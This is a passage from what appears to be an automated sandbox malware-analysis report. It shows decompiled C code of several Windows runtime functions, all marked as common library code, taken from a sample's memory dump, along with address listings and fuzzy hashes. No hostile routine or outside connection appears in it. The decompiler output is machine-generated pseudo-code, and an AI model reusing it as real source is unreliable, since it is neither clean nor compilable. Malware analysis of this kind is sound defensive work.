							_t77 = 1;
							_t68 = 1;
							if( *0x18a8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x18a8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E017BB6F0(0x179c338, 0x179c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E017F9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E017F95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E017CFFB0(_t68, _t77, 0x18a8778);
				}
				_pop(_t78);
				return E017FB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                    0x018369b5
                                                    0x018369be
                                                    0x018369c3
                                                    0x018369c9
                                                    0x018369cc
                                                    0x018369d1
                                                    0x018369d3
                                                    0x018369de
                                                    0x018369e1
                                                    0x018369ea
                                                    0x018369f6
                                                    0x018369fe
                                                    0x01836a13
                                                    0x01836a14
                                                    0x01836a15
                                                    0x01836a16
                                                    0x01836a1e
                                                    0x01836a26
                                                    0x01836a31
                                                    0x01836a36
                                                    0x01836a37
                                                    0x01836a40
                                                    0x01836a49
                                                    0x01836a4a
                                                    0x01836a53
                                                    0x01836a59
                                                    0x01836a5d
                                                    0x01836a5e
                                                    0x01836a64
                                                    0x01836a67
                                                    0x01836a6a
                                                    0x01836a6d
                                                    0x01836a70
                                                    0x01836a77
                                                    0x01836a7d
                                                    0x01836a86
                                                    0x01836a89
                                                    0x01836a9c
                                                    0x01836a9f
                                                    0x01836aa2
                                                    0x01836aa5
                                                    0x01836aaf
                                                    0x01836ab1
                                                    0x01836ab8
                                                    0x01836ab9
                                                    0x01836abb
                                                    0x01836abe
                                                    0x01836ac5
                                                    0x01836ac5
                                                    0x01836aaf
                                                    0x01836a40
                                                    0x01836a26
                                                    0x018369fe
                                                    0x01836ace
                                                    0x01836ad0
                                                    0x01836ad3
                                                    0x01836ad8
                                                    0x01836adf
                                                    0x01836adf
                                                    0x01836ae8
                                                    0x01836aef
                                                    0x01836aef
                                                    0x01836af9
                                                    0x01836b06

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b1172eca7de7092218678c16d132611505d95cad4691a54f53db823e29e3577f
                                                    • Instruction ID: 4def6bc701511768341888890178a2598850d6ea9326468784f7e917e9ec9286
                                                    • Opcode Fuzzy Hash: b1172eca7de7092218678c16d132611505d95cad4691a54f53db823e29e3577f
                                                    • Instruction Fuzzy Hash: 32415EB1D01209AFDB14DFA9D944BEEFBF4EF48714F18812AE914E7240EB749A06CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017B5210 Relevance: .1, Instructions: 107COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E017B5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E017B52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E017F95D0();
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E017CEB70(_t54, 0x18a79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E017F95D0();
								L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E017CEB70(_t54, 0x18a79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E017FF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E017CEB70(_t54, 0x18a79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E017F95D0();
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                    0x017b5220
                                                    0x017b5224
                                                    0x01810d13
                                                    0x01810d16
                                                    0x01810d19
                                                    0x017b522a
                                                    0x017b522a
                                                    0x017b522d
                                                    0x017b522d
                                                    0x017b5231
                                                    0x017b5235
                                                    0x017b5239
                                                    0x01810d5c
                                                    0x01810d62
                                                    0x00000000
                                                    0x00000000
                                                    0x01810d6a
                                                    0x01810d7b
                                                    0x01810d7f
                                                    0x01810d81
                                                    0x01810d84
                                                    0x01810d95
                                                    0x01810d95
                                                    0x01810d6c
                                                    0x01810d71
                                                    0x01810d71
                                                    0x01810d9a
                                                    0x00000000
                                                    0x017b524a
                                                    0x017b524a
                                                    0x017b5250
                                                    0x01810d24
                                                    0x01810d35
                                                    0x01810d39
                                                    0x01810d3b
                                                    0x01810d3e
                                                    0x01810d50
                                                    0x01810d50
                                                    0x01810d26
                                                    0x01810d2b
                                                    0x01810d2b
                                                    0x00000000
                                                    0x01810d55
                                                    0x017b5256
                                                    0x017b525b
                                                    0x017b5265
                                                    0x01810da7
                                                    0x017b526b
                                                    0x017b526e
                                                    0x017b5272
                                                    0x01810db1
                                                    0x01810db4
                                                    0x01810dc5
                                                    0x01810dc5
                                                    0x017b5272
                                                    0x017b5278
                                                    0x017b527e
                                                    0x017b528a
                                                    0x017b528c
                                                    0x017b528d
                                                    0x00000000
                                                    0x017b5280
                                                    0x017b5282
                                                    0x017b5288
                                                    0x017b529f
                                                    0x017b5292
                                                    0x00000000
                                                    0x017b5292
                                                    0x00000000
                                                    0x017b5288
                                                    0x017b527e

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be68ff9009ccddf8f503e1b77c3f76cf79d35086aa0a79c6b38023acf36198c8
                                                    • Instruction ID: c44f58c938d1da238c7739bb0c1a2a5bd29cfee04295703b3e2805cb66db4f79
                                                    • Opcode Fuzzy Hash: be68ff9009ccddf8f503e1b77c3f76cf79d35086aa0a79c6b38023acf36198c8
                                                    • Instruction Fuzzy Hash: D3311632246601DBD7269F18CC85FAAFB79FF10720F51472AF5568B298DB30EA40C690
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F3D43 Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017F3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E017C7B60(0, _t61, 0x17911c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E017C7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L017D4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                    0x017f3d4c
                                                    0x017f3d50
                                                    0x017f3d55
                                                    0x017f3d5e
                                                    0x0182e79a
                                                    0x00000000
                                                    0x0182e79a
                                                    0x017f3d68
                                                    0x0182e789
                                                    0x017f3d9d
                                                    0x017f3da3
                                                    0x017f3daf
                                                    0x017f3db5
                                                    0x017f3dbc
                                                    0x017f3dc4
                                                    0x017f3dc9
                                                    0x017f3dce
                                                    0x0182e7ae
                                                    0x0182e7ae
                                                    0x017f3dde
                                                    0x017f3de2
                                                    0x017f3de7
                                                    0x017f3e0d
                                                    0x017f3e13
                                                    0x017f3e16
                                                    0x017f3e1e
                                                    0x017f3e25
                                                    0x017f3e28
                                                    0x00000000
                                                    0x00000000
                                                    0x017f3e2a
                                                    0x017f3e2f
                                                    0x017f3e37
                                                    0x017f3e37
                                                    0x00000000
                                                    0x017f3e37
                                                    0x017f3e31
                                                    0x00000000
                                                    0x017f3e31
                                                    0x017f3e20
                                                    0x017f3e20
                                                    0x017f3e35
                                                    0x00000000
                                                    0x017f3de9
                                                    0x017f3de9
                                                    0x017f3de9
                                                    0x017f3dee
                                                    0x017f3dfd
                                                    0x017f3dff
                                                    0x017f3e02
                                                    0x017f3e05
                                                    0x017f3e05
                                                    0x00000000
                                                    0x017f3df0
                                                    0x017f3de7
                                                    0x0182e78f
                                                    0x0182e794
                                                    0x017f3d79
                                                    0x017f3d84
                                                    0x017f3d89
                                                    0x017f3d8e
                                                    0x00000000
                                                    0x0182e7a4
                                                    0x017f3d96
                                                    0x017f3d9a
                                                    0x00000000
                                                    0x017f3d9a
                                                    0x00000000
                                                    0x0182e794
                                                    0x017f3d6e
                                                    0x017f3d73
                                                    0x00000000
                                                    0x0182e7b5
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 028f017dc671227310c2d40b69d3a6805023c5bc99f6d9f1bccdf14d3c46a1da
                                                    • Instruction ID: 67ba10301caadfcf33e1dce54cf461ec6fb15d0ca0d4a93a36745983ab615013
                                                    • Opcode Fuzzy Hash: 028f017dc671227310c2d40b69d3a6805023c5bc99f6d9f1bccdf14d3c46a1da
                                                    • Instruction Fuzzy Hash: B3318D71A05625DBD7298F2DC841A6BFBA5FF49B10B0580AEEA45CB390E634D880C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017EA61C Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E017EA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1890220);
				E0180D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x18a7b9c; // 0x0
				_t55 = L017D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0180D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x18a7b10 =  *0x18a7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x18a536c; // 0x77e15368
					if( *_t51 != 0x18a5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x18a5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x18a536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E017EA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                    0x017ea61c
                                                    0x017ea61e
                                                    0x017ea623
                                                    0x017ea628
                                                    0x017ea62b
                                                    0x017ea62d
                                                    0x017ea648
                                                    0x017ea64a
                                                    0x017ea64f
                                                    0x01829b44
                                                    0x017ea6ec
                                                    0x017ea6f1
                                                    0x017ea6f1
                                                    0x017ea655
                                                    0x017ea657
                                                    0x017ea65a
                                                    0x017ea65d
                                                    0x017ea662
                                                    0x017ea663
                                                    0x017ea667
                                                    0x017ea668
                                                    0x017ea66d
                                                    0x017ea706
                                                    0x017ea706
                                                    0x01829bda
                                                    0x01829be6
                                                    0x01829beb
                                                    0x00000000
                                                    0x01829beb
                                                    0x017ea679
                                                    0x01829b7a
                                                    0x00000000
                                                    0x01829b7a
                                                    0x017ea683
                                                    0x017ea6f4
                                                    0x017ea6f7
                                                    0x017ea6f9
                                                    0x017ea6fd
                                                    0x017ea6a0
                                                    0x017ea6a0
                                                    0x017ea6ad
                                                    0x017ea6af
                                                    0x017ea6b4
                                                    0x01829ba7
                                                    0x01829bac
                                                    0x00000000
                                                    0x00000000
                                                    0x01829bc6
                                                    0x01829bce
                                                    0x01829bd1
                                                    0x01829bd3
                                                    0x01829bd3
                                                    0x00000000
                                                    0x01829bd1
                                                    0x017ea6bd
                                                    0x017ea6c3
                                                    0x017ea6c6
                                                    0x017ea6d2
                                                    0x017ea701
                                                    0x017ea704
                                                    0x00000000
                                                    0x017ea704
                                                    0x017ea6d4
                                                    0x017ea6d6
                                                    0x017ea6d9
                                                    0x017ea6db
                                                    0x017ea6e1
                                                    0x017ea6e6
                                                    0x017ea6e8
                                                    0x017ea6e8
                                                    0x017ea6ea
                                                    0x00000000
                                                    0x017ea6ea
                                                    0x017ea688
                                                    0x017ea692
                                                    0x017ea694
                                                    0x017ea699
                                                    0x00000000
                                                    0x00000000
                                                    0x017ea69d
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a03a1d8735270f097eff02efbf4b06ce62eb1e108ff279c3b77d838478a4629
                                                    • Instruction ID: da287b7ee6d9f002bcfc04def99933a590706dad7bee58e6fecfa4f3519edeea
                                                    • Opcode Fuzzy Hash: 0a03a1d8735270f097eff02efbf4b06ce62eb1e108ff279c3b77d838478a4629
                                                    • Instruction Fuzzy Hash: A4418AB5A00229DFDB15CF58C890B99BBF1BF8A308F1980A9E905EB344C775AA41CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017DC182 Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E017DC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E017D7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01888D34(_v8, _t80);
					}
					E017D2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E017CFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01888833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E017CFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E017FB180();
						if(_a4 != 0) {
							E017D2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E017DBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E017DBB2D(_t16, _t15);
						E017DB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E017CFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E017CFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E017CFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                    0x017dc18d
                                                    0x017dc18f
                                                    0x017dc191
                                                    0x017dc19b
                                                    0x017dc1a0
                                                    0x017dc1d4
                                                    0x017dc1de
                                                    0x01822d6e
                                                    0x017dc1e4
                                                    0x017dc1e4
                                                    0x017dc1e4
                                                    0x017dc1ec
                                                    0x01822d7d
                                                    0x01822d7d
                                                    0x017dc1f3
                                                    0x017dc1ff
                                                    0x01822d88
                                                    0x01822d8d
                                                    0x01822d94
                                                    0x01822d94
                                                    0x01822d9f
                                                    0x01822da4
                                                    0x01822dab
                                                    0x01822db0
                                                    0x01822db2
                                                    0x01822db3
                                                    0x01822db4
                                                    0x01822dbc
                                                    0x01822dc3
                                                    0x01822dc3
                                                    0x017dc205
                                                    0x017dc205
                                                    0x017dc208
                                                    0x017dc20e
                                                    0x017dc211
                                                    0x017dc216
                                                    0x017dc219
                                                    0x017dc21f
                                                    0x017dc222
                                                    0x017dc22c
                                                    0x017dc234
                                                    0x017dc23a
                                                    0x017dc23f
                                                    0x017dc245
                                                    0x017dc24b
                                                    0x017dc251
                                                    0x017dc25a
                                                    0x017dc276
                                                    0x017dc27d
                                                    0x017dc27d
                                                    0x017dc25c
                                                    0x017dc25c
                                                    0x00000000
                                                    0x017dc25e
                                                    0x017dc1a4
                                                    0x017dc1aa
                                                    0x017dc1b3
                                                    0x017dc265
                                                    0x017dc26c
                                                    0x017dc26c
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction ID: 00a5aab0976ec68a3c01bb35fe5d4aaf19f58ff058172641f9a839089b8b67ac
                                                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction Fuzzy Hash: 65316672A0558FBED706EBB8C480BEAFB75BF52200F04415ED51C87205DB356A4ACBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01837016 Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E01837016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x18ad360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01836B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01836B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E017D7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E017F9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E017FB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L017D4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                    0x01837016
                                                    0x0183701e
                                                    0x0183702b
                                                    0x01837033
                                                    0x01837037
                                                    0x0183703c
                                                    0x0183703e
                                                    0x01837041
                                                    0x01837045
                                                    0x0183704a
                                                    0x01837050
                                                    0x01837055
                                                    0x0183705a
                                                    0x01837062
                                                    0x01837062
                                                    0x0183705a
                                                    0x01837064
                                                    0x01837064
                                                    0x01837067
                                                    0x01837071
                                                    0x01837096
                                                    0x0183709b
                                                    0x018370a2
                                                    0x018370a6
                                                    0x018370a7
                                                    0x018370ad
                                                    0x018370b3
                                                    0x018370b6
                                                    0x018370bb
                                                    0x018370c3
                                                    0x018370c3
                                                    0x018370c6
                                                    0x018370cd
                                                    0x018370dd
                                                    0x018370e0
                                                    0x018370e2
                                                    0x018370e2
                                                    0x018370ee
                                                    0x01837101
                                                    0x018370f0
                                                    0x018370f9
                                                    0x018370f9
                                                    0x0183710a
                                                    0x0183710e
                                                    0x01837112
                                                    0x01837117
                                                    0x01837118
                                                    0x01837118
                                                    0x018370bb
                                                    0x0183711d
                                                    0x01837123
                                                    0x01837131
                                                    0x01837131
                                                    0x01837136
                                                    0x0183713d
                                                    0x0183713e
                                                    0x0183713f
                                                    0x0183714a
                                                    0x0183714a
                                                    0x01837084
                                                    0x01837088
                                                    0x00000000
                                                    0x0183708e
                                                    0x0183708e
                                                    0x01837092
                                                    0x00000000
                                                    0x01837092

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0139154ce854808cdef3552f7bee38a2b93b33d081bc09dd6403b64bd3897705
                                                    • Instruction ID: 165a6093a7bbb9450f76805c0dece7fae67cb44c500c248c673ea324c2ff7887
                                                    • Opcode Fuzzy Hash: 0139154ce854808cdef3552f7bee38a2b93b33d081bc09dd6403b64bd3897705
                                                    • Instruction Fuzzy Hash: 2231A2B26047519BD325DF2CC840A6AB7A5BFC8700F084A29F995D7690E730EA04CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01863D40 Relevance: .1, Instructions: 98COMMON
